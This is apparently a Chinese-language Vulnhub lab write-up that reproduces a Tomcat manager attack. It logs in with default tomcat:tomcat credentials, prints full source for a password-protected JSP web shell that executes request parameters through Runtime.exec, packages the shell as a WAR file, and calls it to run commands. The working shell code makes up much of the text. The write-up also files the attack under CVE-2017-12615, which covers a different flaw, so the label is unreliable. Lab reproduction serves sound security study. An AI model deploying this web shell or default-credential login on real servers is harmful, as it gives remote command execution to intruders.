Vulnhub-Tomcat系列漏洞–CVE-2017-12615

漏洞简述

Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。

正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

准备环境

启动Vulnhub靶机环境:

漏洞复现

打开tomcat管理页面

进入后台http://192.168.94.129:8080/manager/html,输入默认账户及密码tomcat:tomcat

在本机上制作一句话木马,写入cmd.jsp中再讲jsp文件压缩程zip文件,最终修改zip文件尾缀为war,上传即可。

一句话木马文件内容为:

<%

    if("023".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("pre");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("/pre");

    }

%>

可以看到已经生成了cmd文件夹,访问木马文件即可远程执行命令:

ip:8080/cmd1/cmd.jsp?pwd=023&i=pwd

 

漏洞利用成功